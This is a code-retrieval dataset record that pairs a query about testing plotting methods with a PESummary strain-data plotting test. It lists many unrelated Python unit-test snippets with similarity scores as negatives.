BaseTknzr.enc\n assert lmp.tknzr._bpe.BPETknzr.norm == BaseTknzr.norm\n assert lmp.tknzr._bpe.BPETknzr.pad_to_max == BaseTknzr.pad_to_max\n assert lmp.tknzr._bpe.BPETknzr.vocab_size == BaseTknzr.vocab_size", "def mockup(cls):\n pass", "def test_new_method_appendded():\n expected = True\n actual = \"breadth_first\" in dir(Graph)\n assert expected ==actual", "def test_class_method() -> None:\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.add_CLI_args) == inspect.signature(BaseTknzr.add_CLI_args)", "def test_stub(self):\n pass", "def test_regular_method(self):\n self.assertIdentical(self.wrapper.close.im_func,\n self.client.close.im_func)", "def test__foo__MethodsWorkWithSyntacticalFormAndMethodCallInterchangably(self):\n\t\tc = Controller()\n\t\tx = c.mock(KlassBeingMocked)\n\t\tx.g.__getitem__(5)\n\t\tc.setReturn(6)\n\t\tx.h.__getitem__(7)\n\t\tc.setReturn(8)\n\t\tc.replay()\n\t\tself.failUnless(x.g[5] == 6)\n\t\tself.failUnless(x.h.__getitem__(7) == 8)", "def test_blow_up(self):\n self.assertTrue(self.g.__class__)", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def test_class_eq_method(self, test_instances):\n a, b, _ = test_instances\n\n assert a == b", "def test_uparforvarg(self):", "def test_010(self):\n caller = self.get_caller([SingleMethod])\n self.assertEqual(\"I have very little to say.\", caller())", "def testBeliefs1sk(self):", "def test_bound_methods_hash():\r\n a = Klass()\r\n b = Klass()\r\n nose.tools.assert_equal(hash(filter_args(a.f, [], (1, ))),\r\n hash(filter_args(b.f, [], (1, ))))", "def test_shared_method(self):\r\n\r\n m1=Module()\r\n m1.x=T.dscalar()\r\n x=T.dscalar()\r\n fy=Method(x,x*2)\r\n fz=Method([],m1.x*2)\r\n m1.y=fy\r\n 
m1.z=fz\r\n m1.ly=[fy]\r\n m1.lz=[fz]\r\n m1.lly=[[fy]]\r\n m1.llz=[[fz]]\r\n m1.ty=(fy,)\r\n m1.tz=(fz,)\r\n m1.tty=((fy,),)\r\n m1.ttz=((fz,),)\r\n m1.dy={'y':fy}\r\n m1.dz={'z':fz}\r\n\r\n inst=m1.make()\r\n inst.x=1\r\n assert inst.y(2)==4\r\n assert inst.z()==2\r\n assert inst.ly[0](2)==4\r\n assert inst.lz[0]()==2\r\n assert inst.ty[0](2)==4\r\n assert inst.tz[0]()==2\r\n assert inst.dy['y'](2)==4\r\n assert inst.dz['z']()==2\r\n assert inst.lly[0][0](2)==4\r\n assert inst.llz[0][0]()==2\r\n assert inst.tty[0][0](2)==4\r\n assert inst.ttz[0][0]()==2\r\n assert isinstance(inst.z,theano.compile.function_module.Function)\r\n assert isinstance(inst.lz[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.llz[0][0],theano.compile.function_module.Function)\r\n assert isinstance(inst.tz[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.dz['z'],theano.compile.function_module.Function)\r\n assert isinstance(inst.ttz[0][0],theano.compile.function_module.Function)\r\n assert isinstance(inst.y,theano.compile.function_module.Function)\r\n assert isinstance(inst.ly[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.lly[0][0],theano.compile.function_module.Function)\r\n assert isinstance(inst.ty[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.dy['y'],theano.compile.function_module.Function)\r\n assert isinstance(inst.tty[0][0],theano.compile.function_module.Function)\r\n\r\n\r\n assert m1.y is m1.ly[0]\r\n assert inst.y is inst.ly[0]\r\n assert inst.y is inst.lly[0][0]\r\n assert inst.y is inst.ty[0]\r\n assert inst.y is inst.tty[0][0]\r\n assert inst.y is inst.dy['y']", "def test_method_appending():\n expected = True\n actual = \"getEdge\" in dir(Graph)\n assert expected ==actual", "def test_recheck_fails(self):\n raise NotImplementedError", "def test_expected_qtest_proxies(qtbot, expected_method):\n assert hasattr(qtbot, expected_method)\n assert getattr(qtbot, expected_method).__name__ == expected_method", "def test_4_4_1_1(self):\n pass", "def testEquality(self):\n pass", "def test_call(self):\r\n x = self.FWP({'x': 3})\r\n self.assertEqual(x(), 3)", "def test_bound_methods():\r\n a = Klass()\r\n b = Klass()\r\n nose.tools.assert_not_equal(filter_args(a.f, [], (1, )),\r\n filter_args(b.f, [], (1, )))", "def test_b(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='1.2', name='bar')\n\n self.assertTrue(v1 != v2)\n self.assertTrue(v2 != v1)", "def test_compare(self):", "def test_update(self):\n # this is tested graphically, as it is UI\n pass", "def test_static_methods():\n my_method = SGMethod(\"Test\")\n assert False == my_method.is_static\n \n my_method.is_static = True\n assert my_method.is_static", "def testProtocolReturn(self):\n self.assertEqual(\n self.protocol,\n self.mr.protocol\n )\n\n self.mr._protocol = 'burp'\n\n self.assertEqual(\n 'burp',\n self.mr.protocol\n )", "def test_method(self, test, another_test, _): # noqa: D213, D407", "def test_same_method_name_different_class(self):\n self.apple.take_then_give_back(self.cherry)\n apple_take_give_back_cherry_key = get_function_cache_key('method', 'tests.Fruit.take_then_give_back',\n (self.apple, self.cherry), {})\n self.assertExpectedKeyInCache(apple_take_give_back_cherry_key)\n\n self.celery.take_then_give_back(self.cherry)\n celery_take_give_back_cherry_key = get_function_cache_key('method', 'tests.Vegetable.take_then_give_back',\n (self.celery, self.cherry), {})\n 
self.assertExpectedKeyInCache(celery_take_give_back_cherry_key)\n\n self.assertNotEqual(apple_take_give_back_cherry_key, celery_take_give_back_cherry_key)", "def test_update9(self):\n pass", "def test_update_goal(self):\n pass", "def test_method(self):", "def test_instance_method():\n assert hasattr(ResRNNBlock, '__init__')\n assert inspect.signature(ResRNNBlock.__init__) == Signature(\n parameters=[\n Parameter(\n name='self',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n default=Parameter.empty,\n ),\n Parameter(\n name='d_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='p_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=float,\n default=Parameter.empty,\n ),\n Parameter(\n name='kwargs',\n kind=Parameter.VAR_KEYWORD,\n annotation=Optional[Dict],\n ),\n ],\n return_annotation=Signature.empty,\n )\n\n assert hasattr(ResRNNBlock, 'forward')\n assert inspect.signature(ResRNNBlock.forward) == Signature(\n parameters=[\n Parameter(\n name='self',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n default=Parameter.empty,\n ),\n Parameter(\n name='batch_tk_reps',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n annotation=torch.Tensor,\n default=Parameter.empty,\n ),\n ],\n return_annotation=torch.Tensor,\n )\n\n assert hasattr(ResRNNModel, '__init__')\n assert inspect.signature(ResRNNModel.__init__) == Signature(\n parameters=[\n Parameter(\n name='self',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n default=Parameter.empty,\n ),\n Parameter(\n name='d_emb',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='d_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_post_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_pre_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='p_emb',\n kind=Parameter.KEYWORD_ONLY,\n annotation=float,\n default=Parameter.empty,\n ),\n Parameter(\n name='p_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=float,\n default=Parameter.empty,\n ),\n Parameter(\n name='tknzr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=BaseTknzr,\n default=Parameter.empty,\n ),\n Parameter(\n name='kwargs',\n kind=Parameter.VAR_KEYWORD,\n annotation=Optional[Dict],\n ),\n ],\n return_annotation=Signature.empty,\n )", "def test_turtle(self):\n assert not inspection.is_fixture_method(DummyTestCase.turtle_method)", "def test_py_closure(self):", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def test_update_case(self):\n pass", "def test_update_state2(self):\n pass", "def test_instance_method(self):\n self.assertEqual(self.Test.update_attributes.im_class, self.Test)", "def test_cl_fix():\n assert Cl is BaseCl", "def test_ledger_apis(self):\n assert self.ledger_state_proxy.ledger_apis == self.ledger_apis, \"Must be equal.\"", "def test_b(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='1.2', name='bar')\n\n self.assertFalse(v1 == v2)\n self.assertFalse(v2 == v1)", "def test_update(self):\n pass", "def test_update(self):\n pass", "def 
test_update(self):\n pass", "def test_let(self):", "def verify(self):", "def test_empty_functions():", "def test(self):\n raise NotImplementedError", "def assert_wrappers_equal(first, second):\n assert first.sk_params == second.sk_params\n assert first.history_ == second.history_\n if not first.model_ or not second.model_:\n assert first.model_ == second.model_\n else:\n assert_models_equal(first.model, second.model)", "def test_instance_method(self):\n self.assertEqual(self.Test.delete.im_class, self.Test)", "def test_basic_method_call_wrapper():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 0", "def test_update_state4(self):\n pass", "def test_untar(self):", "def test_a(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='2.2.3', name='bar')\n\n self.assertTrue(v1 != v2)\n self.assertTrue(v2 != v1)", "def test(self):", "def test(self):", "def test_theft_and_stealing(self):", "def test_method_creation():\n my_method = SGMethod(\"Test\")\n \n assert my_method.name == \"Test\"\n assert len(my_method.params) == 0\n assert my_method.return_type == None", "def test_class_method(self):\n self.assertEqual(self.Test.unscoped.im_self.__name__, 'Test')", "def test_4(self):\n params_spec, options_spec = generate_random_model()\n respy_obj = RespyCls(params_spec, options_spec)\n\n # Ensure that backward induction routines use the same grid for the\n # interpolation.\n write_interpolation_grid(respy_obj)\n\n # Extract class attributes\n (\n num_periods,\n edu_spec,\n optim_paras,\n num_draws_emax,\n seed_emax,\n is_debug,\n is_interpolated,\n num_points_interp,\n optimizer_options,\n file_sim,\n num_types,\n ) = dist_class_attributes(\n respy_obj,\n \"num_periods\",\n \"edu_spec\",\n \"optim_paras\",\n \"num_draws_emax\",\n \"seed_emax\",\n \"is_debug\",\n \"is_interpolated\",\n \"num_points_interp\",\n \"optimizer_options\",\n \"file_sim\",\n \"num_types\",\n )\n\n shocks_cholesky = optim_paras[\"shocks_cholesky\"]\n coeffs_common = optim_paras[\"coeffs_common\"]\n coeffs_home = optim_paras[\"coeffs_home\"]\n coeffs_edu = optim_paras[\"coeffs_edu\"]\n coeffs_a = optim_paras[\"coeffs_a\"]\n coeffs_b = optim_paras[\"coeffs_b\"]\n delta = optim_paras[\"delta\"]\n\n type_spec_shifts = optim_paras[\"type_shifts\"]\n type_spec_shares = optim_paras[\"type_shares\"]\n\n min_idx = edu_spec[\"max\"] + 1\n\n # Check the state space creation.\n state_space = StateSpace(\n num_periods, num_types, edu_spec[\"start\"], edu_spec[\"max\"], optim_paras\n )\n\n states_all, mapping_state_idx, _, _ = state_space._get_fortran_counterparts()\n\n pyth = (\n states_all,\n state_space.states_per_period,\n mapping_state_idx,\n state_space.states_per_period.max(),\n )\n\n f2py = fort_debug.wrapper_create_state_space(\n num_periods, num_types, edu_spec[\"start\"], edu_spec[\"max\"], min_idx\n )\n for i in range(4):\n # Slice Fortran output to shape of Python output.\n if isinstance(f2py[i], np.ndarray):\n f2py_reduced = f2py[i][tuple(map(slice, pyth[i].shape))]\n else:\n f2py_reduced = f2py[i]\n\n assert_allclose(pyth[i], f2py_reduced)\n\n _, _, pyth, _ = state_space._get_fortran_counterparts()\n\n f2py = fort_debug.wrapper_calculate_rewards_systematic(\n num_periods,\n state_space.states_per_period,\n states_all,\n state_space.states_per_period.max(),\n coeffs_common,\n coeffs_a,\n coeffs_b,\n coeffs_edu,\n 
coeffs_home,\n type_spec_shares,\n type_spec_shifts,\n )\n\n assert_allclose(pyth, f2py)\n\n # Carry some results from the systematic rewards calculation for future use and\n # create the required set of disturbances.\n periods_draws_emax = create_draws(\n num_periods, num_draws_emax, seed_emax, is_debug\n )\n\n # Save result for next test.\n periods_rewards_systematic = pyth.copy()\n\n # Fix for hardcoded myopic agents.\n optim_paras[\"delta\"] = 0.00000000000000001\n\n # Check backward induction procedure.\n state_space = pyth_backward_induction(\n periods_draws_emax,\n state_space,\n is_debug,\n is_interpolated,\n num_points_interp,\n optim_paras,\n file_sim,\n False,\n )\n _, _, _, pyth = state_space._get_fortran_counterparts()\n\n f2py = fort_debug.wrapper_backward_induction(\n num_periods,\n False,\n state_space.states_per_period.max(),\n periods_draws_emax,\n num_draws_emax,\n state_space.states_per_period,\n periods_rewards_systematic,\n mapping_state_idx,\n states_all,\n is_debug,\n is_interpolated,\n num_points_interp,\n edu_spec[\"start\"],\n edu_spec[\"max\"],\n shocks_cholesky,\n delta,\n coeffs_common,\n coeffs_a,\n coeffs_b,\n file_sim,\n False,\n )\n\n assert_allclose(pyth, f2py)", "def test_should_implement(self):\n pass", "def test_nothing(self):", "def test_eq(self):\n self.assertEqual(self.gmail_case, self.gmail_case_from_init)", "def unitary_test():", "def test_equal_basic(self):\n utils.compare_tracing_methods(\n SimpleCompareOpsModule(\"equal\"),\n torch.randn(3, 4, 5),\n torch.randn(3, 4, 5),\n fusible_ops={\"aten::eq\"},\n )", "def test_same_models(self):\n\t\t\n\t\t# TODO: finish\n\t\tpass", "def test_ne():\n # Define some universal gsps\n gsp = galsim.GSParams(maxk_threshold=1.1e-3, folding_threshold=5.1e-3)\n\n # Pixel. Params include scale, flux, gsparams.\n # gsparams.\n # The following should all test unequal:\n gals = [galsim.Pixel(scale=1.0),\n galsim.Pixel(scale=1.1),\n galsim.Pixel(scale=1.0, flux=1.1),\n galsim.Pixel(scale=1.0, gsparams=gsp)]\n all_obj_diff(gals)\n\n # Box. Params include width, height, flux, gsparams.\n # gsparams.\n # The following should all test unequal:\n gals = [galsim.Box(width=1.0, height=1.0),\n galsim.Box(width=1.1, height=1.0),\n galsim.Box(width=1.0, height=1.1),\n galsim.Box(width=1.0, height=1.0, flux=1.1),\n galsim.Box(width=1.0, height=1.0, gsparams=gsp)]\n all_obj_diff(gals)\n\n # TopHat. 
Params include radius, flux, gsparams.\n # gsparams.\n # The following should all test unequal:\n gals = [galsim.TopHat(radius=1.0),\n galsim.TopHat(radius=1.1),\n galsim.TopHat(radius=1.0, flux=1.1),\n galsim.TopHat(radius=1.0, gsparams=gsp)]\n all_obj_diff(gals)", "def test_multiple_rng_aliasing():\r\n rng1 = MRG_RandomStreams(1234)\r\n rng2 = MRG_RandomStreams(2392)\r\n assert rng1.state_updates is not rng2.state_updates", "def test_class_method(self):\n self.assertEqual(pyperry.Base.adapter.im_self.__name__, 'Base')", "def test_call_interface_twice(self, monkeypatch, data):\n monkeypatch.delenv(\"ORION_RESULTS_PATH\", raising=False)\n reloaded_client = reload(cli)\n\n reloaded_client.report_results(data)\n with pytest.raises(RuntimeWarning) as exc:\n reloaded_client.report_results(data)\n\n assert \"already reported\" in str(exc.value)\n assert reloaded_client.IS_ORION_ON is False\n assert reloaded_client.RESULTS_FILENAME is None\n assert reloaded_client._HAS_REPORTED_RESULTS is True", "def test_class_methods(self):\n\n x = BaseTransformer()\n\n h.test_object_method(obj=x, expected_method=\"fit\", msg=\"fit\")\n\n h.test_object_method(obj=x, expected_method=\"transform\", msg=\"transform\")\n\n h.test_object_method(\n obj=x, expected_method=\"columns_set_or_check\", msg=\"columns_set_or_check\"\n )\n\n h.test_object_method(\n obj=x, expected_method=\"columns_check\", msg=\"columns_check\"\n )", "def testOverrideOfTwoItems(self):\n\t\tc = Controller()\n\t\tx = KlassBeingMocked()\n\t\ty = KlassBeingMocked()\n\t\tx.f = 38\n\t\ty.g = 39\n\t\tc.override(x, 'f', 5)\n\t\tc.override(y, 'g', 6)\n\t\tself.failUnless(x.f == 5)\n\t\tself.failUnless(y.g == 6)\n\t\tc.restore()\n\t\tself.failUnless(x.f == 38)\n\t\tself.failUnless(y.g == 39)", "def testConsistency(self):", "def _test(self):\n pass", "def _test(self):\n pass", "def _test(self):\n pass", "def test(self):\n pass", "def test_c(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='1.2.3', name='bar')\n\n self.assertFalse(v1 != v2)\n self.assertFalse(v2 != v1)", "def test_same_static_method_name_different_class_instance_reference(self):\n self.apple.static_method(self.cherry)\n apple_static_method_key = get_function_cache_key('function', 'tests.Fruit.static_method', (self.cherry,), {})\n self.assertExpectedKeyInCache(apple_static_method_key)\n\n self.celery.static_method(self.cherry)\n celery_static_method_key = get_function_cache_key('function', 'tests.Vegetable.static_method', (self.cherry,),\n {})\n self.assertExpectedKeyInCache(celery_static_method_key)\n\n self.assertNotEqual(apple_static_method_key, celery_static_method_key)", "def test_update_no_args(self):\n Base._Base__nb_objects = 0\n s = Square(1, 0, 0, 1)\n s.update()\n self.assertEqual(str(s), \"[Square] (1) 0/0 - 1\")", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass" ]
[ "0.68101746", "0.6541694", "0.65237844", "0.65063614", "0.6301085", "0.62971485", "0.61756206", "0.61576486", "0.6139045", "0.6088883", "0.6029623", "0.602739", "0.6020766", "0.60056776", "0.5970609", "0.5970609", "0.5970609", "0.5970609", "0.5970609", "0.5945786", "0.5943556", "0.5927632", "0.5893446", "0.5884779", "0.5863099", "0.58585036", "0.58582294", "0.58557373", "0.585177", "0.5846566", "0.58144027", "0.580986", "0.58038926", "0.5799261", "0.57687676", "0.5767392", "0.574993", "0.573741", "0.5712727", "0.570028", "0.5699727", "0.56965315", "0.5694435", "0.5679296", "0.5676317", "0.5672133", "0.5672133", "0.5670074", "0.56693673", "0.5668017", "0.56604856", "0.5652901", "0.56517416", "0.56457293", "0.56457293", "0.56457293", "0.5640788", "0.5614568", "0.5611866", "0.56064886", "0.56011695", "0.55968684", "0.559323", "0.55918676", "0.5586408", "0.5569257", "0.55465376", "0.55465376", "0.55441725", "0.5543793", "0.55412436", "0.553968", "0.55376756", "0.55281115", "0.5528109", "0.5526921", "0.55186224", "0.5509099", "0.5503336", "0.55026484", "0.5502545", "0.55020994", "0.55003405", "0.5498964", "0.54979086", "0.549666", "0.549666", "0.549666", "0.5495543", "0.5495075", "0.5495023", "0.549346", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685" ]
0.0
-1
Test that the plotting methods work as expected
def test_plots(self): args = ["L1", 1126259446, 1126259478] pesummary_data = StrainData.fetch_open_data(*args) fig = pesummary_data.plot(type="td") assert isinstance(fig, matplotlib.figure.Figure) fig = pesummary_data.plot(type="fd") assert isinstance(fig, matplotlib.figure.Figure) fig = pesummary_data.plot(1126259446 + 20., type="omegascan") assert isinstance(fig, matplotlib.figure.Figure) fig = pesummary_data.plot(type="spectrogram") assert isinstance(fig, matplotlib.figure.Figure)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_plotting():\n specs = _read_schrodinger('tests/test_data/{}.inp'.format(PROBLEM))\n xint, yint = _interpolate(specs['interpolxydecs'][:, 0],\n specs['interpolxydecs'][:, 1], specs['xopt'])\n\n energies = np.loadtxt('tests/test_data/energies_{}.ref'.format(PROBLEM))\n wfuncsdata = np.loadtxt('tests/test_data/wfuncs_{}.ref'.format(PROBLEM))\n potdata = np.vstack((xint, yint)).T\n\n expval = calculate_expval(xint, wfuncsdata[:, 1:].T)\n uncval = calculate_uncertainty(xint, wfuncsdata[:, 1:].T)\n\n expvaldata = np.vstack((expval, uncval)).T\n _write_data('tests/test_data', potdata, energies, wfuncsdata, expvaldata)\n\n # qm_plottings('tests/test_data', scale=0.5)\n # assert True", "def test_no_arguments(self):\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n lines = ax.plot()\n assert lines == []", "def plot():\n pass", "def test_plotting():\n out_dir = _TempDir()\n fname, behf, corrupted = make_raw(out_dir)\n raw = _read_raw(fname, preload=True)\n pd = raw._data[0]\n candidates = _find_pd_candidates(\n pd, max_len=max_len, baseline=baseline,\n zscore=zscore, max_flip_i=max_flip_i, sfreq=raw.info['sfreq'])[0]\n beh = _read_tsv(behf)\n beh_events = np.array(beh['fix_onset_time']) * raw.info['sfreq']\n beh_events_adjusted, alignment, events = _find_best_alignment(\n beh_events, candidates, exclude_shift, resync, raw.info['sfreq'],\n verbose=False)\n errors = beh_events_adjusted - events + alignment\n _plot_trial_errors(beh_events_adjusted, alignment, events,\n errors, exclude_shift, raw.info['sfreq'])\n errors[abs(errors) / raw.info['sfreq'] > 2 * exclude_shift] = np.nan\n np.testing.assert_array_almost_equal(\n plt.gca().lines[0].get_ydata(), errors)\n section_data = [(0, 'test', np.random.random(10))]\n _plot_excluded_events(section_data, 2)\n assert plt.gca().title.get_text() == 'test'\n np.testing.assert_array_equal(plt.gca().lines[0].get_ydata(),\n section_data[0][2])", "def test_make_plot_custom(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='c',plot_title='test',ylabel='test',xlabel='test',xticks=[0,2,4,6],yticks=[0,2,4,6])\n except Exception as e:\n raise\n plt.close('all')", "def plot_test(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n plt.close('all')\n\n func(*args, **kwargs)\n\n ax = plt.gca()\n assert ax.has_data()\n\n return wrapper", "def test_execution(self):\n self.result = self.plot(tree=self.tree, feature_table=self.table,\n sample_metadata=self.md,\n feature_metadata=self.fmd)\n self.assertIsInstance(self.result, Results)\n self.assertIsInstance(self.result.visualization, Visualization)\n # TODO check details of viz more carefully (likely by digging into the\n # index HTML of self.result.visualization, etc.)", "def test_point_plot(self):\n clf()\n filename = 'points_plot.png'\n N = 10\n points = GeoSeries(Point(i, i) for i in xrange(N))\n ax = points.plot()\n self._compare_images(ax=ax, filename=filename)", "def test_plot_ess(models, kind, kwargs):\n idata = models.model_1\n ax = plot_ess(idata, kind=kind, **kwargs)\n assert np.all(ax)", "def test_make_plot_ur(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='ur')\n except Exception as e:\n raise\n plt.close('all')", "def plot(self):\n pass", "def test_poly_plot(self):\n clf()\n filename = 'poly_plot.png'\n t1 = Polygon([(0, 0), (1, 0), (1, 1)])\n t2 = Polygon([(1, 0), (2, 0), (2, 1)])\n polys = GeoSeries([t1, t2])\n 
ax = polys.plot()\n self._compare_images(ax=ax, filename=filename)", "def test_data_with_five_arguments():\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n data = {'tn0': tn0, 'tn1': tn1, 'tn2': tn2}\n with pytest.raises(ValueError):\n ax.plot('tn0', 'tn1', 'tn2', 'foo', 'bar', data=data)", "def testPlots(self):\n\t\tself.watcher.analyze(layers=[67], plot=True, randomize=True)", "def test_plot_error(self, script_runner: ScriptRunner, tmp_path: Path) -> None:\n outfile = tmp_path.joinpath(\"projection.png\")\n logfile = tmp_path.joinpath(\"plot.log\")\n result = script_runner.run(\n \"qaa\",\n \"plot\",\n \"-i\",\n \"test.csv\",\n \"-o\",\n outfile.as_posix(),\n \"-l\",\n logfile.as_posix(),\n \"--pca\",\n \"--verbose\",\n )\n assert not result.success\n assert not logfile.exists()\n assert not outfile.exists()", "def test_path(self, x_path, y_path):\n\t\tplt.plot(x_path, y_path, 'bo')\n\t\tplt.plot(x_path, y_path, 'b-')\n\t\tplt.show()", "def evaluate(self, plot):", "def plot(self, *args, **kwargs):\n pass", "def test_make_plot_ui(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='ui')\n except Exception as e:\n raise\n plt.close('all')", "def make_plot(x,y):", "def test_make_plot_invalid_plot_type(self):\n print(sys._getframe().f_code.co_name)\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n self.assertRaises(Exception,pp.make_plot,x,y,plot_type='wrong',msg='Invalid plot type')", "def test_plt_status():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_status()\n\n assert bokeh_plot_type == type(result)", "def plot_data(self):", "def test_plot_graphs(self):\n\n # Graphs who are not embedded, i.e., have no coordinates.\n COORDS_NO = {\n 'Graph',\n 'BarabasiAlbert',\n 'ErdosRenyi',\n 'FullConnected',\n 'RandomRegular',\n 'StochasticBlockModel',\n }\n\n # Coordinates are not in 2D or 3D.\n COORDS_WRONG_DIM = {'ImgPatches'}\n\n Gs = []\n for classname in set(graphs.__all__) - COORDS_NO - COORDS_WRONG_DIM:\n Graph = getattr(graphs, classname)\n\n # Classes who require parameters.\n if classname == 'NNGraph':\n Xin = np.arange(90).reshape(30, 3)\n Gs.append(Graph(Xin))\n elif classname in ['ImgPatches', 'Grid2dImgPatches']:\n Gs.append(Graph(img=self._img, patch_shape=(3, 3)))\n elif classname == 'LineGraph':\n Gs.append(Graph(graphs.Sensor(20, seed=42)))\n else:\n Gs.append(Graph())\n\n # Add more test cases.\n if classname == 'TwoMoons':\n Gs.append(Graph(moontype='standard'))\n Gs.append(Graph(moontype='synthesized'))\n elif classname == 'Cube':\n Gs.append(Graph(nb_dim=2))\n Gs.append(Graph(nb_dim=3))\n elif classname == 'DavidSensorNet':\n Gs.append(Graph(N=64))\n Gs.append(Graph(N=500))\n Gs.append(Graph(N=128))\n\n for G in Gs:\n self.assertTrue(hasattr(G, 'coords'))\n self.assertEqual(G.N, G.coords.shape[0])\n\n signal = np.arange(G.N) + 0.3\n\n G.plot(backend='pyqtgraph')\n G.plot(backend='matplotlib')\n G.plot(signal, backend='pyqtgraph')\n G.plot(signal, backend='matplotlib')\n plotting.close_all()", "def _plot_init(self):\n pass", "def _plot_init(self):\n pass", "def plot(self, *args, **kwargs):\n raise NotImplementedError", "def plot(self):\n raise Exception(\"pure virtual function\")", "def test_signature(self, method):\n fig = plt.figure()\n ax_test = fig.add_subplot(projection=\"ternary\")\n ax_ref = fig.add_subplot()\n signature_test = 
inspect.signature(getattr(ax_test, method))\n signature_ref = inspect.signature(getattr(ax_ref, method))\n assert signature_test == signature_ref", "def test_plot_color(self):\n lname = os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_E_10-5_over_5-3') + \\\n HEN_FILE_EXTENSION\n cname = os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_E_10-5_over_5-3') + \\\n HEN_FILE_EXTENSION\n hen.plot.main([cname, lname, '--noplot', '--xlog', '--ylog', '--CCD',\n '-o', 'dummy.qdp'])", "def test_plot_ess_evolution(models):\n idata = models.model_1\n ax = plot_ess(idata, kind=\"evolution\", extra_kwargs={\"linestyle\": \"--\"}, color=\"b\")\n assert np.all(ax)", "def test_plot_ppc_ax(models, kind, fig_ax):\n _, ax = fig_ax\n axes = plot_ppc(models.model_1, kind=kind, ax=ax)\n assert np.asarray(axes).item(0) is ax", "def test_plot_drift(self):\n with patch('matplotlib.pyplot.show') as mock: # don't display the figure\n with patch('matplotlib.pyplot.savefig') as mock2: # don't display the figure\n times = (datetime.datetime(2000, 1, 1), datetime.datetime(2000, 1, 2), datetime.datetime(2000, 1, 3))\n ref_ratio = (0, 0, 0)\n plot = librad_drift.RadiometricDrift.plot_radiometric_drift\n drift = plot(times, ref_ratio, 'target', 'reference', band=0, doplot=False)\n self.assertEqual(drift, 0)", "def test_plot1(plot=1, version='scalar'):\n Lx = 10\n Ly = 10\n c = 1.0\n\n def I2(x, y):\n return exp(-(x-Lx/2.0)**2/2.0 -(y-Ly/2.0)**2/2.0)\n def f(x, y, t):\n return 0.0\n def bc(x, y, t):\n return 0.0\n\n I2 = StringFunction('exp(-(x-Lx/2.0)**2/2.0 -(y-Ly/2.0)**2/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('0.0', independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('0.0', independent_variables=('x', 'y', 't'),\n globals=globals())\n if plot:\n g = Gnuplot.Gnuplot(persist=1)\n g('set parametric')\n g('set data style lines')\n g('set hidden')\n g('set contour base')\n g('set zrange [-0.7:0.7]') # nice plot...\n \n def action(u, xv, yv, t):\n #print 'action, t=',t,'\\nu=',u, '\\nx=',x, '\\ny=', y\n if plot:\n data = Gnuplot.GridData(u, xv[:,0], yv[0,:], binary=0)\n g.splot(data)\n g('set title \"t=%g\"' % t)\n if plot == 2:\n g.hardcopy(filename='tmp_%020f.ps' % t, enhanced=1, mode='eps',\n color=0, fontname='Times-Roman', 